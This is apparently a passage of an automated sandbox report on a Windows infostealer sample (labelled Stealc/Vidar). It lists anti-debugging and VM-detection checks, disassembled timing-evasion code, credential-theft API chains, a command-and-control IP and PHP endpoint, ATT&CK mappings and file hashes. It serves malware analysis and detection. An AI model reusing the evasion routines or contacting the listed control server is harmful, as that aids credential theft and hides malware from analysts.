                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8A0D second address: AB8A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F74491B01E4h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABAA7C second address: ABAA9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7448D3A008h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA748 second address: ABA750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA750 second address: ABA75C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDB03 second address: ABDB0D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F74491B01D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDB0D second address: ABDB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F7448D3A011h 0x0000000c jmp 00007F7448D3A005h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDB30 second address: ABDB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABDB34 second address: ABDB88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A009h 0x00000007 je 00007F7448D39FF8h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jnc 00007F7448D3A02Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7448D39FFFh 0x0000001e jmp 00007F7448D3A008h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACB82A second address: ACB85C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F74491B01D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 jl 00007F74491B01D6h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F74491B01E8h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC61F second address: ACC647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D3A001h 0x00000007 jo 00007F7448D39FFEh 0x0000000d push esi 0x0000000e pop esi 0x0000000f js 00007F7448D39FF6h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC647 second address: ACC64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACC64D second address: ACC651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACF587 second address: ACF591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ACF591 second address: ACF596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: ACF596 second address: ACF59B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD0B5B second address: AD0B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7448D3A009h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD3523 second address: AD3527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD37D4 second address: AD37DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7448D39FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD37DE second address: AD3832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ebx 0x0000000d sub dword ptr [ebp+124494FFh], eax 0x00000013 pop edx 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F74491B01D8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr [ebp+12459DDEh], ecx 0x00000036 push 70C96AC1h 0x0000003b push eax 0x0000003c push edx 0x0000003d jnp 00007F74491B01D8h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD3832 second address: AD383C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7448D39FF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD3B51 second address: AD3B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F74491B01D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: AD54CA second address: AD54CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 512031F second address: 5120343 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F74491B01E0h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5120343 second address: 5120349 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51203C4 second address: 51203C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51203C8 second address: 51203CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9DFAF6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9DF7AE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: A6C57E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005F38B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005F4910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_005EDA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_005EE430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_005F4570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_005EED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_005EBE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005EDE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005E16D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005EF6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_005F3EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E1160 GetSystemInfo,ExitProcess,0_2_005E1160
                Source: file.exe, file.exe, 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1699870972.0000000001184000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWPc
                Source: file.exe, 00000000.00000002.1699870972.00000000011C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node, graph_0-13559
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node, graph_0-13556
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node, graph_0-13579
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node, graph_0-13571
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node, graph_0-13611
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E45C0 VirtualProtect ?,00000004,00000100,00000000,0_2_005E45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_005F9860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F9750 mov eax, dword ptr fs:[00000030h],0_2_005F9750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005F7850
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_005F9600
                Source: file.exe, 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: I,\Program Manager
                Source: file.exe | Binary or memory string: I,\Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_005F7B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_005F6920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_005F7850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_005F7A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.5e0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1659012750.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.5e0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1659012750.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 6996, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label
                file.exe | 42% | Virustotal |
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/ws | 17% | Virustotal |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.phpTI | file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpXI | file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpLI | file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version: 41.0.0 Charoite
                      Analysis ID: 1522481
                      Start date and time: 2024-09-30 08:57:05 +02:00
                      Joe Sandbox product: CloudBasic
                      Overall analysis duration: 0h 2m 40s
                      Hypervisor based Inspection enabled: false
                      Report type: full
                      Cookbook file name: default.jbs
                      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of new started processes analysed: 1
                      Number of new started drivers analysed: 0
                      Number of existing processes analysed: 0
                      Number of existing drivers analysed: 0
                      Number of injected processes analysed: 0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode: default
                      Analysis stop reason: Timeout
                      Sample name: file.exe
                      Detection: MAL
                      Classification: mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 82
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      No simulations
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | SecuriteInfo.com.Win32.Evo-gen.16378.4678.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
                      185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      No context
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      WHOLESALECONNECTIONSNL | SecuriteInfo.com.Win32.Evo-gen.16378.4678.exe | malicious | Amadey, Stealc | 185.215.113.103
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc | 185.215.113.103
                      WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                      No context
                      No context
                      No created / dropped files found
                      File type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit): 7.948611109269336
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name: file.exe
                      File size: 1'868'800 bytes
                      MD5: f74ed5926c551ea89e49d964e729e736
                      SHA1: 115d45e11d815a3773f95b401ac64711c3a3e99c
                      SHA256: c978352670126322d013cb1afb3b8ce7bfcc1f0a39765f5dead460dc7f608717
                      SHA512: b917148554b232eec9fce319791e87b4fd7630ea9b16db4b899bafb7406ac516c1418dda0f5286be1c9cd86acd516a405dda8c85b9cccab59e1a17dac46750df
                      SSDEEP: 49152:zzgWOqtxDQL+/nn70NnCtVb1trDTeuxsnb:4WOq7U6nIGbzrDU
                      TLSH: D1853339BFDFFC82C599827818770F944398A1594AFF8C140B6DB99DE883671851F8B1
                      File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                      Icon Hash: 90cececece8e8eb0
                      Entrypoint: 0xaa4000
                      Entrypoint Section: .taggant
                      Digitally signed: false
                      Imagebase: 0x400000
                      Subsystem: windows gui
                      Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major: 5
                      OS Version Minor: 1
                      File Version Major: 5
                      File Version Minor: 1
                      Subsystem Version Major: 5
                      Subsystem Version Minor: 1
                      Import Hash: 2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      jmp 00007F74487E635Ah
                      punpckldq mm3, qword ptr [eax+eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      jmp 00007F74487E8355h
                      add byte ptr [ecx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax+00h], ah
                      add byte ptr [eax], al
                      inc esp
                      nop
                      test al, 0Fh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dword ptr [edx], ecx
                      add byte ptr [eax], al
                      or dword ptr [edx], ecx
                      add byte ptr [eax], al
                      or cl, byte ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
